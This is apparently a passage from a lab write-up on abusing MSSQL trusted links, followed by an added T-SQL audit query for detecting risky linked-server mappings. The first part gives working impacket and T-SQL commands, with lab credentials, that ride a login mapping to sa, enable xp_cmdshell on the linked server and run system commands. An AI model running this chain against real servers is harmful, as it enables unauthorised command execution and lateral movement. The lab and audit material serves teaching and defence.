MSSQL trusted links
Another SQL abuse we can try in the lab is the use of MSSQL trusted links.
Note that trusted links are also a forest-to-forest technique.
To abuse the links, let's connect as elena.lopez and use enum_links:
mssqlclient.py -windows-auth north.newyork.local/elena.lopez:princesa1@yonkers.north.newyork.local -show
enum_links
This runs the following queries:
EXEC sp_linkedservers
EXEC sp_helplinkedsrvlogin

As we can see, a linked server exists with the name Salisbury, and a login mapping exists between the user Elena.Lopez and sa on Salisbury.
If we use the link, we can get a command injection on Salisbury:
use_link Salisbury
enable_xp_cmdshell
xp_cmdshell whoami
This runs the following MSSQL commands:
EXEC ('select system_user as "username"') AT Salisbury
EXEC ('exec master.dbo.sp_configure ''show advanced options'',1;RECONFIGURE;exec master.dbo.sp_configure ''xp_cmdshell'', 1;RECONFIGURE;') AT Salisbury
EXEC ('exec master..xp_cmdshell ''whoami''') AT Salisbury

We got a command injection on Salisbury.Maryland.local as maryland\sql_svc
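
The conditions that made this chain work (a link with RPC out, a fixed login mapping to sa, and xp_cmdshell that can be switched on) can be audited from the catalog views on each instance. The following T-SQL is an added example, not part of the original write-up; it assumes the privileged remote login is still named sa, as in the lab, and that the auditing login can view server-level metadata.

```sql
-- Added audit example (not from the original page).
-- Run on every SQL Server instance that may host linked servers.

-- 1) Linked servers and their login mappings, with risky combinations flagged.
SELECT
    s.name                    AS linked_server,
    s.data_source,
    s.is_rpc_out_enabled,     -- required for EXEC ('...') AT <link>
    s.is_data_access_enabled,
    COALESCE(sp.name, '<all logins without an explicit mapping>') AS local_login,
    ll.uses_self_credential,  -- 1 = the caller's own credentials are passed through
    ll.remote_name            AS remote_login,
    CASE
        WHEN ll.uses_self_credential = 0
             AND ll.remote_name = 'sa'      -- assumption: sa has not been renamed
             AND s.is_rpc_out_enabled = 1
            THEN 'HIGH: fixed mapping to sa with RPC out enabled'
        WHEN ll.uses_self_credential = 0 AND ll.remote_name = 'sa'
            THEN 'MEDIUM: fixed mapping to sa'
        WHEN ll.uses_self_credential = 0 AND ll.local_principal_id = 0
            THEN 'MEDIUM: every local login shares one remote login'
        ELSE 'review'
    END                       AS finding
FROM sys.servers AS s
JOIN sys.linked_logins AS ll
    ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS sp
    ON sp.principal_id = ll.local_principal_id   -- 0 = default mapping, no principal row
WHERE s.is_linked = 1
ORDER BY finding, s.name;

-- 2) Current state of the options the chain toggles through the link.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options');
```

A HIGH row on the source instance corresponds to the Elena.Lopez to sa mapping shown above; the second query belongs on the link target, where a value_in_use of 1 for xp_cmdshell outside a change window is worth alerting on.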